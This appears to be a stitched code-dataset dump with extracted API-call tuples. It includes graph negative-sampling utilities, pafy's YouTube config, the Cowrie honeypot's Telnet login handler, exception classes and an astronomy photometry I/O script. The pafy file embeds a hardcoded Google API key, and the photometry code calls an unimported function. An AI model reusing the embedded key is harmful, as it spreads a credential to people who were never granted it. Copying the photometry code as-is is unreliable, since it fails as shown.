rand = torch.randint(num_nodes, (row.size(0), ), dtype=torch.long)
neg_idx = row * num_nodes + rand
mask = torch.from_numpy(np.isin(neg_idx, pos_idx)).to(torch.bool)
rest = mask.nonzero(as_tuple=False).view(-1)
while rest.numel() > 0: # pragma: no cover
tmp = torch.randint(num_nodes, (rest.size(0), ), dtype=torch.long)
rand[rest] = tmp
neg_idx = row[rest] * num_nodes + tmp
mask = torch.from_numpy(np.isin(neg_idx, pos_idx)).to(torch.bool)
rest = rest[mask]
return edge_index[0], edge_index[1], rand.to(edge_index.device)
def structured_negative_sampling_feasible(
edge_index: Tensor, num_nodes: Optional[int] = None,
contains_neg_self_loops: bool = True) -> bool:
r"""Returns :obj:`True` if
:meth:`~torch_geometric.utils.structured_negative_sampling` is feasible
on the graph given by :obj:`edge_index`.
:obj:`~torch_geometric.utils.structured_negative_sampling` is infeasible
if atleast one node is connected to all other nodes.
Args:
edge_index (LongTensor): The edge indices.
num_nodes (int, optional): The number of nodes, *i.e.*
:obj:`max_val + 1` of :attr:`edge_index`. (default: :obj:`None`)
contains_neg_self_loops (bool, optional): If set to
:obj:`False`, sampled negative edges will not contain self loops.
(default: :obj:`True`)
:rtype: bool
"""
num_nodes = maybe_num_nodes(edge_index, num_nodes)
max_num_neighbors = num_nodes
edge_index = coalesce(edge_index, num_nodes=num_nodes)
if not contains_neg_self_loops:
edge_index, _ = remove_self_loops(edge_index)
max_num_neighbors -= 1 # Reduce number of valid neighbors
deg = degree(edge_index[0], num_nodes)
# True if there exists no node that is connected to all other nodes.
return bool(torch.all(deg < max_num_neighbors))
###############################################################################
def sample(population: int, k: int, device=None) -> Tensor:
if population <= k:
return torch.arange(population, device=device)
else:
return torch.tensor(random.sample(range(population), k), device=device)
def edge_index_to_vector(
edge_index: Tensor,
size: Tuple[int, int],
bipartite: bool,
force_undirected: bool = False,
) -> Tuple[Tensor, int]:
row, col = edge_index
if bipartite: # No need to account for self-loops.
idx = (row * size[1]).add_(col)
population = size[0] * size[1]
return idx, population
elif force_undirected:
assert size[0] == size[1]
num_nodes = size[0]
# We only operate on the upper triangular matrix:
mask = row < col
row, col = row[mask], col[mask]
offset = torch.arange(1, num_nodes, device=row.device).cumsum(0)[row]
idx = row.mul_(num_nodes).add_(col).sub_(offset)
population = (num_nodes * (num_nodes + 1)) // 2 - num_nodes
return idx, population
else:
assert size[0] == size[1]
num_nodes = size[0]
# We remove self-loops as we do not want to take them into account
# when sampling negative values.
mask = row != col
row, col = row[mask], col[mask]
col[row < col] -= 1
idx = row.mul_(num_nodes - 1).add_(col)
population = num_nodes * num_nodes - num_nodes
return idx, population
def vector_to_edge_index(idx: Tensor, size: Tuple[int, int], bipartite: bool,
force_undirected: bool = False) -> Tensor:
if bipartite: # No need to account for self-loops.
row = idx.div(size[1], rounding_mode='floor')
col = idx % size[1]
return torch.stack([row, col], dim=0)
elif force_undirected:
assert size[0] == size[1]
num_nodes = size[0]
offset = torch.arange(1, num_nodes, device=idx.device).cumsum(0)
end = torch.arange(num_nodes, num_nodes * num_nodes, num_nodes,
device=idx.device)
row = torch.bucketize(idx, end.sub_(offset), right=True)
col = offset[row].add_(idx) % num_nodes
return torch.stack([torch.cat([row, col]), torch.cat([col, row])], 0)
else:
assert size[0] == size[1]
num_nodes = size[0]
row = idx.div(num_nodes - 1, rounding_mode='floor')
col = idx % (num_nodes - 1)
col[row <= col] += 1
return torch.stack([row, col], dim=0)
| [((5711, 5748), 'torch.split', 'torch.split', (['edge_index', 'split'], {'dim': '(1)'}), '(edge_index, split, dim=1)\n', (5722, 5748), False, 'import torch\n'), ((5764, 5799), 'torch_geometric.utils.degree', 'degree', (['src_batch'], {'dtype': 'torch.long'}), '(src_batch, dtype=torch.long)\n', (5770, 5799), False, 'from torch_geometric.utils import coalesce, degree, remove_self_loops\n'), ((6667, 6701), 'torch.cat', 'torch.cat', (['neg_edge_indices'], {'dim': '(1)'}), '(neg_edge_indices, dim=1)\n', (6676, 6701), False, 'import torch\n'), ((9298, 9339), 'torch_geometric.utils.coalesce', 'coalesce', (['edge_index'], {'num_nodes': 'num_nodes'}), '(edge_index, num_nodes=num_nodes)\n', (9306, 9339), False, 'from torch_geometric.utils import coalesce, degree, remove_self_loops\n'), ((9509, 9541), 'torch_geometric.utils.degree', 'degree', (['edge_index[0]', 'num_nodes'], {}), '(edge_index[0], num_nodes)\n', (9515, 9541), False, 'from torch_geometric.utils import coalesce, degree, remove_self_loops\n'), ((5999, 6034), 'torch_geometric.utils.degree', 'degree', (['dst_batch'], {'dtype': 'torch.long'}), '(dst_batch, dtype=torch.long)\n', (6005, 6034), False, 'from torch_geometric.utils import coalesce, degree, remove_self_loops\n'), ((7712, 7749), 'torch.cat', 'torch.cat', (['[pos_idx, loop_idx]'], {'dim': '(0)'}), '([pos_idx, loop_idx], dim=0)\n', (7721, 7749), False, 'import torch\n'), ((9401, 9430), 'torch_geometric.utils.remove_self_loops', 'remove_self_loops', (['edge_index'], {}), '(edge_index)\n', (9418, 9430), False, 'from torch_geometric.utils import coalesce, degree, remove_self_loops\n'), ((9631, 9665), 'torch.all', 'torch.all', (['(deg < max_num_neighbors)'], {}), '(deg < max_num_neighbors)\n', (9640, 9665), False, 'import torch\n'), ((9850, 9889), 'torch.arange', 'torch.arange', (['population'], {'device': 'device'}), '(population, device=device)\n', (9862, 9889), False, 'import torch\n'), ((11503, 11533), 'torch.stack', 'torch.stack', (['[row, col]'], {'dim': '(0)'}), '([row, col], dim=0)\n', (11514, 11533), False, 'import torch\n'), ((3509, 3526), 'numpy.isin', 'np.isin', (['rnd', 'idx'], {}), '(rnd, idx)\n', (3516, 3526), True, 'import numpy as np\n'), ((5632, 5682), 'torch_geometric.utils.degree', 'degree', (['src_batch[edge_index[0]]'], {'dtype': 'torch.long'}), '(src_batch[edge_index[0]], dtype=torch.long)\n', (5638, 5682), False, 'from torch_geometric.utils import coalesce, degree, remove_self_loops\n'), ((7652, 7675), 'torch.arange', 'torch.arange', (['num_nodes'], {}), '(num_nodes)\n', (7664, 7675), False, 'import torch\n'), ((11712, 11788), 'torch.arange', 'torch.arange', (['num_nodes', '(num_nodes * num_nodes)', 'num_nodes'], {'device': 'idx.device'}), '(num_nodes, num_nodes * num_nodes, num_nodes, device=idx.device)\n', (11724, 11788), False, 'import torch\n'), ((12221, 12251), 'torch.stack', 'torch.stack', (['[row, col]'], {'dim': '(0)'}), '([row, col], dim=0)\n', (12232, 12251), False, 'import torch\n'), ((3045, 3070), 'torch.cat', 'torch.cat', (['[neg_idx, rnd]'], {}), '([neg_idx, rnd])\n', (3054, 3070), False, 'import torch\n'), ((3777, 3802), 'torch.cat', 'torch.cat', (['[neg_idx, rnd]'], {}), '([neg_idx, rnd])\n', (3786, 3802), False, 'import torch\n'), ((6134, 6172), 'torch.stack', 'torch.stack', (['[num_src, num_dst]'], {'dim': '(1)'}), '([num_src, num_dst], dim=1)\n', (6145, 6172), False, 'import torch\n'), ((6199, 6237), 'torch.stack', 'torch.stack', (['[cum_src, cum_dst]'], {'dim': '(1)'}), '([cum_src, cum_dst], dim=1)\n', (6210, 6237), False, 'import torch\n'), ((7888, 7913), 'numpy.isin', 'np.isin', (['neg_idx', 'pos_idx'], {}), '(neg_idx, pos_idx)\n', (7895, 7913), True, 'import numpy as np\n'), ((3638, 3660), 'torch.from_numpy', 'torch.from_numpy', (['mask'], {}), '(mask)\n', (3654, 3660), False, 'import torch\n'), ((8206, 8231), 'numpy.isin', 'np.isin', (['neg_idx', 'pos_idx'], {}), '(neg_idx, pos_idx)\n', (8213, 8231), True, 'import numpy as np\n'), ((11642, 11687), 'torch.arange', 'torch.arange', (['(1)', 'num_nodes'], {'device': 'idx.device'}), '(1, num_nodes, device=idx.device)\n', (11654, 11687), False, 'import torch\n'), ((11957, 11978), 'torch.cat', 'torch.cat', (['[row, col]'], {}), '([row, col])\n', (11966, 11978), False, 'import torch\n'), ((11980, 12001), 'torch.cat', 'torch.cat', (['[col, row]'], {}), '([col, row])\n', (11989, 12001), False, 'import torch\n'), ((10566, 10611), 'torch.arange', 'torch.arange', (['(1)', 'num_nodes'], {'device': 'row.device'}), '(1, num_nodes, device=row.device)\n', (10578, 10611), False, 'import torch\n')] |
DavidJohnKelly/YoutubeDownloader | venv/Lib/site-packages/pafy/g.py | 29cb4aa90946803474959f60d7b7e2f07c6e4de2 | import sys
if sys.version_info[:2] >= (3, 0):
# pylint: disable=E0611,F0401,I0011
from urllib.request import build_opener
else:
from urllib2 import build_opener
from . import __version__
urls = {
'gdata': "https://www.googleapis.com/youtube/v3/",
'watchv': "http://www.youtube.com/watch?v=%s",
'playlist': ('http://www.youtube.com/list_ajax?'
'style=json&action_get_list=1&list=%s'),
'thumb': "http://i.ytimg.com/vi/%s/default.jpg",
'bigthumb': "http://i.ytimg.com/vi/%s/mqdefault.jpg",
'bigthumbhd': "http://i.ytimg.com/vi/%s/hqdefault.jpg",
# For internal backend
'vidinfo': ('https://www.youtube.com/get_video_info?video_id=%s&'
'eurl=https://youtube.googleapis.com/v/%s&sts=%s'),
'embed': "https://youtube.com/embed/%s"
}
api_key = "AIzaSyCIM4EzNqi1in22f4Z3Ru3iYvLaY8tc3bo"
user_agent = "pafy " + __version__
lifespan = 60 * 60 * 5 # 5 hours
opener = build_opener()
opener.addheaders = [('User-Agent', user_agent)]
cache = {}
def_ydl_opts = {'quiet': True, 'prefer_insecure': False, 'no_warnings': True}
# The following are specific to the internal backend
UEFSM = 'url_encoded_fmt_stream_map'
AF = 'adaptive_fmts'
jsplayer = r';ytplayer\.config\s*=\s*({.*?});'
itags = {
'5': ('320x240', 'flv', "normal", ''),
'17': ('176x144', '3gp', "normal", ''),
'18': ('640x360', 'mp4', "normal", ''),
'22': ('1280x720', 'mp4', "normal", ''),
'34': ('640x360', 'flv', "normal", ''),
'35': ('854x480', 'flv', "normal", ''),
'36': ('320x240', '3gp', "normal", ''),
'37': ('1920x1080', 'mp4', "normal", ''),
'38': ('4096x3072', 'mp4', "normal", '4:3 hi-res'),
'43': ('640x360', 'webm', "normal", ''),
'44': ('854x480', 'webm', "normal", ''),
'45': ('1280x720', 'webm', "normal", ''),
'46': ('1920x1080', 'webm', "normal", ''),
'82': ('640x360-3D', 'mp4', "normal", ''),
'83': ('640x480-3D', 'mp4', 'normal', ''),
'84': ('1280x720-3D', 'mp4', "normal", ''),
'100': ('640x360-3D', 'webm', "normal", ''),
'102': ('1280x720-3D', 'webm', "normal", ''),
'133': ('426x240', 'm4v', 'video', ''),
'134': ('640x360', 'm4v', 'video', ''),
'135': ('854x480', 'm4v', 'video', ''),
'136': ('1280x720', 'm4v', 'video', ''),
'137': ('1920x1080', 'm4v', 'video', ''),
'138': ('4096x3072', 'm4v', 'video', ''),
'139': ('48k', 'm4a', 'audio', ''),
'140': ('128k', 'm4a', 'audio', ''),
'141': ('256k', 'm4a', 'audio', ''),
'160': ('256x144', 'm4v', 'video', ''),
'167': ('640x480', 'webm', 'video', ''),
'168': ('854x480', 'webm', 'video', ''),
'169': ('1280x720', 'webm', 'video', ''),
'170': ('1920x1080', 'webm', 'video', ''),
'171': ('128k', 'ogg', 'audio', ''),
'172': ('192k', 'ogg', 'audio', ''),
'218': ('854x480', 'webm', 'video', 'VP8'),
'219': ('854x480', 'webm', 'video', 'VP8'),
'242': ('360x240', 'webm', 'video', 'VP9'),
'243': ('480x360', 'webm', 'video', 'VP9'),
'244': ('640x480', 'webm', 'video', 'VP9 low'),
'245': ('640x480', 'webm', 'video', 'VP9 med'),
'246': ('640x480', 'webm', 'video', 'VP9 high'),
'247': ('720x480', 'webm', 'video', 'VP9'),
'248': ('1920x1080', 'webm', 'video', 'VP9'),
'249': ('48k', 'opus', 'audio', 'Opus'),
'250': ('56k', 'opus', 'audio', 'Opus'),
'251': ('128k', 'opus', 'audio', 'Opus'),
'256': ('192k', 'm4a', 'audio', '6-channel'),
'258': ('320k', 'm4a', 'audio', '6-channel'),
'264': ('2560x1440', 'm4v', 'video', ''),
'266': ('3840x2160', 'm4v', 'video', 'AVC'),
'271': ('1920x1280', 'webm', 'video', 'VP9'),
'272': ('3414x1080', 'webm', 'video', 'VP9'),
'278': ('256x144', 'webm', 'video', 'VP9'),
'298': ('1280x720', 'm4v', 'video', '60fps'),
'299': ('1920x1080', 'm4v', 'video', '60fps'),
'302': ('1280x720', 'webm', 'video', 'VP9'),
'303': ('1920x1080', 'webm', 'video', 'VP9'),
}
| [((940, 954), 'urllib2.build_opener', 'build_opener', ([], {}), '()\n', (952, 954), False, 'from urllib2 import build_opener\n')] |
uwacyber/cowrie | src/cowrie/telnet/userauth.py | 1d81e1ca5d0b8461e06f17aee26cb7bf108a16e5 | # Copyright (C) 2015, 2016 GoSecure Inc.
"""
Telnet Transport and Authentication for the Honeypot
@author: Olivier Bilodeau <[email protected]>
"""
from __future__ import annotations
import struct
from twisted.conch.telnet import (
ECHO,
LINEMODE,
NAWS,
SGA,
AuthenticatingTelnetProtocol,
ITelnetProtocol,
)
from twisted.python import log
from cowrie.core.config import CowrieConfig
from cowrie.core.credentials import UsernamePasswordIP
class HoneyPotTelnetAuthProtocol(AuthenticatingTelnetProtocol):
"""
TelnetAuthProtocol that takes care of Authentication. Once authenticated this
protocol is replaced with HoneyPotTelnetSession.
"""
loginPrompt = b"login: "
passwordPrompt = b"Password: "
windowSize = [40, 80]
def connectionMade(self):
# self.transport.negotiationMap[NAWS] = self.telnet_NAWS
# Initial option negotation. Want something at least for Mirai
# for opt in (NAWS,):
# self.transport.doChain(opt).addErrback(log.err)
# I need to doubly escape here since my underlying
# CowrieTelnetTransport hack would remove it and leave just \n
self.transport.write(self.factory.banner.replace(b"\n", b"\r\r\n"))
self.transport.write(self.loginPrompt)
def connectionLost(self, reason):
"""
Fires on pre-authentication disconnects
"""
AuthenticatingTelnetProtocol.connectionLost(self, reason)
def telnet_User(self, line):
"""
Overridden to conditionally kill 'WILL ECHO' which confuses clients
that don't implement a proper Telnet protocol (most malware)
"""
self.username = line # .decode()
# only send ECHO option if we are chatting with a real Telnet client
self.transport.willChain(ECHO)
# FIXME: this should be configurable or provided via filesystem
self.transport.write(self.passwordPrompt)
return "Password"
def telnet_Password(self, line):
username, password = self.username, line # .decode()
del self.username
def login(ignored):
self.src_ip = self.transport.getPeer().host
creds = UsernamePasswordIP(username, password, self.src_ip)
d = self.portal.login(creds, self.src_ip, ITelnetProtocol)
d.addCallback(self._cbLogin)
d.addErrback(self._ebLogin)
# are we dealing with a real Telnet client?
if self.transport.options:
# stop ECHO
# even if ECHO negotiation fails we still want to attempt a login
# this allows us to support dumb clients which is common in malware
# thus the addBoth: on success and on exception (AlreadyNegotiating)
self.transport.wontChain(ECHO).addBoth(login)
else:
# process login
login("")
return "Discard"
def telnet_Command(self, command):
self.transport.protocol.dataReceived(command + b"\r")
return "Command"
def _cbLogin(self, ial):
"""
Fired on a successful login
"""
interface, protocol, logout = ial
protocol.windowSize = self.windowSize
self.protocol = protocol
self.logout = logout
self.state = "Command"
self.transport.write(b"\n")
# Remove the short timeout of the login prompt.
self.transport.setTimeout(
CowrieConfig.getint("honeypot", "interactive_timeout", fallback=300)
)
# replace myself with avatar protocol
protocol.makeConnection(self.transport)
self.transport.protocol = protocol
def _ebLogin(self, failure):
# TODO: provide a way to have user configurable strings for wrong password
self.transport.wontChain(ECHO)
self.transport.write(b"\nLogin incorrect\n")
self.transport.write(self.loginPrompt)
self.state = "User"
def telnet_NAWS(self, data):
"""
From TelnetBootstrapProtocol in twisted/conch/telnet.py
"""
if len(data) == 4:
width, height = struct.unpack("!HH", b"".join(data))
self.windowSize = [height, width]
else:
log.msg("Wrong number of NAWS bytes")
def enableLocal(self, opt):
if opt == ECHO:
return True
# TODO: check if twisted now supports SGA (see git commit c58056b0)
elif opt == SGA:
return False
else:
return False
def enableRemote(self, opt):
# TODO: check if twisted now supports LINEMODE (see git commit c58056b0)
if opt == LINEMODE:
return False
elif opt == NAWS:
return True
elif opt == SGA:
return True
else:
return False
| [((1410, 1467), 'twisted.conch.telnet.AuthenticatingTelnetProtocol.connectionLost', 'AuthenticatingTelnetProtocol.connectionLost', (['self', 'reason'], {}), '(self, reason)\n', (1453, 1467), False, 'from twisted.conch.telnet import ECHO, LINEMODE, NAWS, SGA, AuthenticatingTelnetProtocol, ITelnetProtocol\n'), ((2208, 2259), 'cowrie.core.credentials.UsernamePasswordIP', 'UsernamePasswordIP', (['username', 'password', 'self.src_ip'], {}), '(username, password, self.src_ip)\n', (2226, 2259), False, 'from cowrie.core.credentials import UsernamePasswordIP\n'), ((3450, 3518), 'cowrie.core.config.CowrieConfig.getint', 'CowrieConfig.getint', (['"""honeypot"""', '"""interactive_timeout"""'], {'fallback': '(300)'}), "('honeypot', 'interactive_timeout', fallback=300)\n", (3469, 3518), False, 'from cowrie.core.config import CowrieConfig\n'), ((4237, 4274), 'twisted.python.log.msg', 'log.msg', (['"""Wrong number of NAWS bytes"""'], {}), "('Wrong number of NAWS bytes')\n", (4244, 4274), False, 'from twisted.python import log\n')] |
flyr4nk/secscan-authcheck | authcheck/app/model/exception.py | d04c6ae3dc1fa7841727d23161c27eebaf92be3c | class WebException(Exception):
pass
class ParserException(Exception):
"""
解析异常
"""
pass
class ApiException(Exception):
"""
api异常
"""
pass
class WsException(Exception):
"""
轮询异常
"""
pass
class SsoException(Exception):
"""
sso异常
"""
pass
class LibException(Exception):
"""
lib异常
"""
pass
class AccountException(Exception):
"""
账号异常(账号失效)
"""
pass
class FlowException(Exception):
"""
认证流量异常
"""
pass
| [] |
JeremyBuchanan/psf-photometry-pipeline | p_io.py | 864818dc8dd946a6e4d8dde1667bf948b769bb39 | import astropy.io.fits as fits
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import obj_data as od
import saphires as saph
from astropy.time import Time
from astropy.visualization import ZScaleInterval, SqrtStretch, ImageNormalize
from matplotlib.backends.backend_pdf import PdfPages
ra = od.ra
dec = od.dec
pmra = od.pmra
pmdec = od.pmdec
plx = od.plx
epoch = od.epoch
matplotlib.rcParams.update({'font.size': 12})
def write_fits(fn, data, im_headers, wcs_header):
'''
Writes a new fits file including the image data and
and updated header for the new image
Parameters
----------
fn: string
The desired file name of the new fits file
data: array-like
Contains all the image data
Returns
-------
avg_airmass: float
the amount of atmosphere obscuring the target, found in image header. Here
the airmass for all images is averaged
bjd: float
Barycentric Julian Date, found in the image header
header: Header
'''
for keys in wcs_header:
if keys not in ['HISTORY', 'COMMENT']:
im_headers[0][keys] = wcs_header[keys]
airmass = []
for i in im_headers:
airmass.append(i['AIRMASS'])
avg_airmass = np.mean(airmass)
im_headers[0]['AIRMASS'] = avg_airmass
jd_middle = np.zeros(len(im_headers))
for i in range(len(im_headers)):
jd_middle[i] = Time(im_headers[i]['DATE-OBS'], format='isot').jd
exptime = im_headers[i]['EXPTIME']
jd_middle[i] = jd_middle[i] + (exptime/2.0)/3600.0/24.0
isot_date_obs = Time(np.mean(jd_middle), format='jd').isot
tele = im_headers[0]['SITEID']
brv,bjd,bvcorr = saph.utils.brvc(isot_date_obs,0.0,tele,ra=ra,dec=dec,epoch=epoch, pmra=pmra, pmdec=pmdec, px=plx)
im_headers[0]['BJD'] = bjd[0]
header = im_headers[0]
hdu_p = fits.PrimaryHDU(data=data, header=header)
hdu = fits.HDUList([hdu_p])
hdu.writeto(fn)
return avg_airmass, bjd, header
def write_pdf(name, images, model=None, final_stars=None, residual_stars=None, fluxes=None, plot_res=None):
pp = PdfPages(name)
for i in range(len(images)):
fig, ax = plt.subplots(1, figsize=(10, 10))
norm = ImageNormalize(images[i], interval=ZScaleInterval(), stretch=SqrtStretch())
im = ax.imshow(images[i], norm=norm)
plt.colorbar(im)
plt.tight_layout()
pp.savefig()
plt.close()
if model is not None:
fig, ax = plt.subplots(1, figsize=(10, 10))
psf = ax.imshow(model)
plt.colorbar(psf)
ax.set_title('PSF Model')
plt.tight_layout()
pp.savefig()
plt.close()
if final_stars is not None:
if plot_res == 'y':
nrows = len(final_stars)
ncols = 2
fig, ax = plt.subplots(nrows=nrows, ncols=ncols, figsize=(10, 800), squeeze=True)
ax = ax.ravel()
index = 0
for i in range(0, nrows*ncols, 2):
norm = simple_norm(final_stars[index],'log')
norm2 = simple_norm(residual_stars[index], 'linear')
im = ax[i].imshow(final_stars[index], norm=norm, origin='lower', cmap='viridis', interpolation='none')
fig.colorbar(im, ax = ax[i])
ax[i].set_title(np.str(fluxes[index]))
im_r = ax[i+1].imshow(residual_stars[index], norm=norm2, origin='lower', cmap='viridis', interpolation='none')
fig.colorbar(im_r, ax = ax[i+1])
index = index + 1
plt.tight_layout()
pp.savefig()
plt.close()
pp.close()
def write_csv(name, im_name, bjd, filt, airmass, results, sky):
f = open(name, 'w')
f.write('NAME, ID, BJD, FLUX, FLUX ERROR, MAG, MAG ERROR, FILTER, X POSITION, Y POSITION, AIRMASS, RA, DEC\n')
for i in range(sky.size):
if results['flux_fit'][i] > 0:
star_id = results['id'][i]
flux = results['flux_fit'][i]
fluxerr = results['flux_unc'][i]
mag = -2.5*np.log10(flux)
magerr = (1.08574*fluxerr)/(flux)
x_pos = results['x_fit'][i]
y_pos = results['y_fit'][i]
ra = sky[i].ra.degree
dec = sky[i].dec.degree
f.write(im_name+','+np.str(i)+','+np.str(bjd)+','+np.str(flux)+','+np.str(fluxerr)+','+np.str(mag)+','+np.str(magerr)
+','+filt+','+np.str(x_pos)+','+np.str(y_pos)+','+str(airmass)+','+np.str(ra)+','+np.str(dec)+'\n')
f.close()
def write_txt(name, sources, stars_tbl, fwhm, results=None, t0=None,t1=None,t2=None,t3=None,t4=None,t5=None):
'''
Short text file with diagnostic info about each image set, specifically
for a successful run of the image set
Parameters
----------
name: string
name of the saved file
sources: Table
tabulated info about all the stars found on the image
stars_tbl: Table
tabulated info about all the stars used to form a psf
results: Table
tabulated info about all the stars found with the photometry routine
'''
f = open(name, 'w')
f.write('Number of stars in sources: '+np.str(len(sources))+'\nNumber of stars in stars_tbl: '+np.str(len(stars_tbl))
+'\nNumbers of stars in results: '+np.str(len(results))+'\nMin, Max, Median peaks in sources: '
+np.str(np.min(sources['peak']))+', '+np.str(np.max(sources['peak']))+', '+np.str(np.median(sources['peak']))
+'\nMin, Max, Median fluxes in results: '+np.str(np.min(results['flux_fit']))+', '+np.str(np.max(results['flux_fit']))+', '
+np.str(np.median(results['flux_fit']))+'\nFWHM: '+np.str(fwhm)+'\n')
if t5:
t_1 = t1-t0
t_2 = t2-t1
t_3 = t3-t2
t_4 = t4-t3
t_5 = t5-t4
t_f = t5-t0
f.write('Time to combine images: '+np.str(t_1)+'\nTime to find stars: '+np.str(t_2)+'\nTime to build psf: '
+np.str(t_3)+'\nTime to run photometry: '+np.str(t_4)+'\nTime to get wcs: '+np.str(t_5)+'\nTotal time: '
+np.str(t_f)+'\n')
f.close()
| [((395, 440), 'matplotlib.rcParams.update', 'matplotlib.rcParams.update', (["{'font.size': 12}"], {}), "({'font.size': 12})\n", (421, 440), False, 'import matplotlib\n'), ((1309, 1325), 'numpy.mean', 'np.mean', (['airmass'], {}), '(airmass)\n', (1316, 1325), True, 'import numpy as np\n'), ((1747, 1854), 'saphires.utils.brvc', 'saph.utils.brvc', (['isot_date_obs', '(0.0)', 'tele'], {'ra': 'ra', 'dec': 'dec', 'epoch': 'epoch', 'pmra': 'pmra', 'pmdec': 'pmdec', 'px': 'plx'}), '(isot_date_obs, 0.0, tele, ra=ra, dec=dec, epoch=epoch, pmra\n =pmra, pmdec=pmdec, px=plx)\n', (1762, 1854), True, 'import saphires as saph\n'), ((1918, 1959), 'astropy.io.fits.PrimaryHDU', 'fits.PrimaryHDU', ([], {'data': 'data', 'header': 'header'}), '(data=data, header=header)\n', (1933, 1959), True, 'import astropy.io.fits as fits\n'), ((1970, 1991), 'astropy.io.fits.HDUList', 'fits.HDUList', (['[hdu_p]'], {}), '([hdu_p])\n', (1982, 1991), True, 'import astropy.io.fits as fits\n'), ((2167, 2181), 'matplotlib.backends.backend_pdf.PdfPages', 'PdfPages', (['name'], {}), '(name)\n', (2175, 2181), False, 'from matplotlib.backends.backend_pdf import PdfPages\n'), ((2233, 2266), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)'], {'figsize': '(10, 10)'}), '(1, figsize=(10, 10))\n', (2245, 2266), True, 'import matplotlib.pyplot as plt\n'), ((2411, 2427), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (['im'], {}), '(im)\n', (2423, 2427), True, 'import matplotlib.pyplot as plt\n'), ((2436, 2454), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (2452, 2454), True, 'import matplotlib.pyplot as plt\n'), ((2484, 2495), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (2493, 2495), True, 'import matplotlib.pyplot as plt\n'), ((2540, 2573), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)'], {'figsize': '(10, 10)'}), '(1, figsize=(10, 10))\n', (2552, 2573), True, 'import matplotlib.pyplot as plt\n'), ((2613, 2630), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (['psf'], {}), '(psf)\n', (2625, 2630), True, 'import matplotlib.pyplot as plt\n'), ((2673, 2691), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (2689, 2691), True, 'import matplotlib.pyplot as plt\n'), ((2721, 2732), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (2730, 2732), True, 'import matplotlib.pyplot as plt\n'), ((1471, 1517), 'astropy.time.Time', 'Time', (["im_headers[i]['DATE-OBS']"], {'format': '"""isot"""'}), "(im_headers[i]['DATE-OBS'], format='isot')\n", (1475, 1517), False, 'from astropy.time import Time\n'), ((1653, 1671), 'numpy.mean', 'np.mean', (['jd_middle'], {}), '(jd_middle)\n', (1660, 1671), True, 'import numpy as np\n'), ((2874, 2945), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': 'nrows', 'ncols': 'ncols', 'figsize': '(10, 800)', 'squeeze': '(True)'}), '(nrows=nrows, ncols=ncols, figsize=(10, 800), squeeze=True)\n', (2886, 2945), True, 'import matplotlib.pyplot as plt\n'), ((3614, 3632), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (3630, 3632), True, 'import matplotlib.pyplot as plt\n'), ((3670, 3681), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (3679, 3681), True, 'import matplotlib.pyplot as plt\n'), ((2317, 2333), 'astropy.visualization.ZScaleInterval', 'ZScaleInterval', ([], {}), '()\n', (2331, 2333), False, 'from astropy.visualization import ZScaleInterval, SqrtStretch, ImageNormalize\n'), ((2343, 2356), 'astropy.visualization.SqrtStretch', 'SqrtStretch', ([], {}), '()\n', (2354, 2356), False, 'from astropy.visualization import ZScaleInterval, SqrtStretch, ImageNormalize\n'), ((4119, 4133), 'numpy.log10', 'np.log10', (['flux'], {}), '(flux)\n', (4127, 4133), True, 'import numpy as np\n'), ((5794, 5806), 'numpy.str', 'np.str', (['fwhm'], {}), '(fwhm)\n', (5800, 5806), True, 'import numpy as np\n'), ((3369, 3390), 'numpy.str', 'np.str', (['fluxes[index]'], {}), '(fluxes[index])\n', (3375, 3390), True, 'import numpy as np\n'), ((6198, 6209), 'numpy.str', 'np.str', (['t_f'], {}), '(t_f)\n', (6204, 6209), True, 'import numpy as np\n'), ((4562, 4573), 'numpy.str', 'np.str', (['dec'], {}), '(dec)\n', (4568, 4573), True, 'import numpy as np\n'), ((5751, 5781), 'numpy.median', 'np.median', (["results['flux_fit']"], {}), "(results['flux_fit'])\n", (5760, 5781), True, 'import numpy as np\n'), ((6152, 6163), 'numpy.str', 'np.str', (['t_5'], {}), '(t_5)\n', (6158, 6163), True, 'import numpy as np\n'), ((4547, 4557), 'numpy.str', 'np.str', (['ra'], {}), '(ra)\n', (4553, 4557), True, 'import numpy as np\n'), ((5697, 5724), 'numpy.max', 'np.max', (["results['flux_fit']"], {}), "(results['flux_fit'])\n", (5703, 5724), True, 'import numpy as np\n'), ((6118, 6129), 'numpy.str', 'np.str', (['t_4'], {}), '(t_4)\n', (6124, 6129), True, 'import numpy as np\n'), ((5656, 5683), 'numpy.min', 'np.min', (["results['flux_fit']"], {}), "(results['flux_fit'])\n", (5662, 5683), True, 'import numpy as np\n'), ((6077, 6088), 'numpy.str', 'np.str', (['t_3'], {}), '(t_3)\n', (6083, 6088), True, 'import numpy as np\n'), ((4512, 4525), 'numpy.str', 'np.str', (['y_pos'], {}), '(y_pos)\n', (4518, 4525), True, 'import numpy as np\n'), ((5567, 5593), 'numpy.median', 'np.median', (["sources['peak']"], {}), "(sources['peak'])\n", (5576, 5593), True, 'import numpy as np\n'), ((6024, 6035), 'numpy.str', 'np.str', (['t_2'], {}), '(t_2)\n', (6030, 6035), True, 'import numpy as np\n'), ((4494, 4507), 'numpy.str', 'np.str', (['x_pos'], {}), '(x_pos)\n', (4500, 4507), True, 'import numpy as np\n'), ((5530, 5553), 'numpy.max', 'np.max', (["sources['peak']"], {}), "(sources['peak'])\n", (5536, 5553), True, 'import numpy as np\n'), ((5987, 5998), 'numpy.str', 'np.str', (['t_1'], {}), '(t_1)\n', (5993, 5998), True, 'import numpy as np\n'), ((5493, 5516), 'numpy.min', 'np.min', (["sources['peak']"], {}), "(sources['peak'])\n", (5499, 5516), True, 'import numpy as np\n'), ((4445, 4459), 'numpy.str', 'np.str', (['magerr'], {}), '(magerr)\n', (4451, 4459), True, 'import numpy as np\n'), ((4429, 4440), 'numpy.str', 'np.str', (['mag'], {}), '(mag)\n', (4435, 4440), True, 'import numpy as np\n'), ((4409, 4424), 'numpy.str', 'np.str', (['fluxerr'], {}), '(fluxerr)\n', 